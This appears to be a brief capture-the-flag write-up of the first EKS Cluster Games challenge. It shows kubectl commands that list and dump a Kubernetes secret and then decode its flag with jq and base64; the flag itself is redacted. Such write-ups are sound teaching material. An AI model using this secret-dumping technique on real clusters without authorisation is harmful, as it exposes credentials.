EKS Cluster Games: Challenge 1 (SPOILERS)

Nov 2, 2023

1 minute read

This is a writeup of how I solved part one of the EKS Cluster Games. Huge thanks to Wiz for putting this together.

Challenge One

This challenge starts with a shell with kubectl.

We can notice right away that we have access to list secrets:

root@wiz-eks-challenge:~# kubectl get secrets
NAME         TYPE     DATA   AGE
log-rotate   Opaque   1      26h

Finding the Flag

We can dump out this secret and then decode it with jq and base64 -d:

root@wiz-eks-challenge:~# kubectl get secrets log-rotate -o json  
{
    "apiVersion": "v1",
    "data": {
        "flag": "d2l6X2Vrc[...]"
    },
    "kind": "Secret",
    "metadata": {
        "creationTimestamp": "2023-11-01T13:02:08Z",
        "name": "log-rotate",
        "namespace": "challenge1",
        "resourceVersion": "890951",
        "uid": "03f6372c-b728-4c5b-ad28-70d5af8d387c"
    },
    "type": "Opaque"
}
root@wiz-eks-challenge:~# kubectl get secrets log-rotate -o json | jq -r .data.flag | base64 -d
wiz_eks_challenge{🚩🚩🚩🚩🚩🚩🚩}

Notes for challenge two.

Back to posts

Challenge One

Finding the Flag

Next